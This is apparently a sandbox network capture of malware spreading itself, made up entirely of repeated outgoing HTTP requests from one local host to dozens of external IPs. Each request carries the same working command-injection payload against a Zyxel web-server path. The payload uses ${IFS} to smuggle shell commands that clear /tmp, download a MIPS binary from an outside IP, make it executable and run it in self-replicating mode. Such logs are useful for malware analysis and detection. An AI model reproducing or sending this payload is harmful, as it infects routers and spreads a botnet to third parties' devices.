                                    Jan 13, 2024 19:02:22.912358999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1639192.168.2.1347092134.102.138.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912417889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1640192.168.2.1341294173.67.187.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912481070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1641192.168.2.133857479.13.202.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912530899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1642192.168.2.1334110138.56.46.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912594080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1643192.168.2.134499260.183.49.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912641048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1644192.168.2.1358338198.182.86.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912679911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1645192.168.2.136001847.23.77.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912703037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1646192.168.2.135138412.137.166.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912770987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1647192.168.2.135061250.244.137.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912847042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1648192.168.2.135359034.246.167.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912882090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1649192.168.2.1340774208.31.74.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912944078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1650192.168.2.1341468114.114.251.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.912986994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1651192.168.2.1360338191.27.198.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913022041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1652192.168.2.1346650222.172.11.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913086891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1653192.168.2.133543437.224.175.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913157940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1654192.168.2.1345260140.74.92.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913206100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1655192.168.2.1347118152.129.120.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913274050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1656192.168.2.1357162177.231.241.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913291931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1657192.168.2.135147257.203.4.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913352013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1658192.168.2.1337400144.68.253.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913394928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1659192.168.2.1347886131.234.207.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913463116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1660192.168.2.1348684147.181.124.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913492918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1661192.168.2.135179644.84.26.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913566113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1662192.168.2.133362259.85.31.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913588047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1663192.168.2.1343534222.198.16.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913657904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1664192.168.2.135217477.34.230.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913701057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1665192.168.2.1343462105.154.101.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913739920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1666192.168.2.134086059.129.12.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913786888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1667192.168.2.1340608110.172.233.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913842916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1668192.168.2.1354934159.163.117.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913911104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1669192.168.2.13570408.98.35.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.913964033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1670192.168.2.1350010186.221.63.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914020061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1671192.168.2.1360702210.57.14.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914077044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1672192.168.2.1360162117.209.139.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914083958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1673192.168.2.135821086.211.50.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914151907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1674192.168.2.1354142144.255.137.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914196014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1675192.168.2.1349102135.152.3.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914263010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1676192.168.2.133697443.178.133.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914325953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1677192.168.2.134875681.176.87.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914356947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1678192.168.2.1353664147.181.169.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914407969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1679192.168.2.134962645.32.98.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914442062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1680192.168.2.1358116116.134.213.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914468050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1681192.168.2.134261423.45.129.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914484024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1682192.168.2.1351332204.138.254.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914525032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1683192.168.2.1343722123.149.175.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914567947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1684192.168.2.135873692.103.242.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914609909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1685192.168.2.1333698134.89.191.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914695024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1686192.168.2.136049238.5.55.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914731979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1687192.168.2.1347122212.212.43.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914782047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1688192.168.2.1357026125.9.1.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914823055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1689192.168.2.1337438161.20.212.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914885998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1690192.168.2.13350509.18.94.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914908886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1691192.168.2.135964636.253.90.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.914973021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1692192.168.2.1360082198.114.212.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.917974949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1693192.168.2.1335040143.235.208.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918018103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1694192.168.2.1340356134.18.155.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918039083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1695192.168.2.1335228132.23.216.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918072939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1696192.168.2.13518681.245.178.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918169975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1697192.168.2.1356482124.176.106.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918206930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1698192.168.2.1354442151.143.3.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918261051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1699192.168.2.1334858205.180.92.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918330908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1700192.168.2.1356446109.183.242.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.918412924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1701192.168.2.1334222177.25.86.50443
                                    TimestampBytes transferredDirectionData
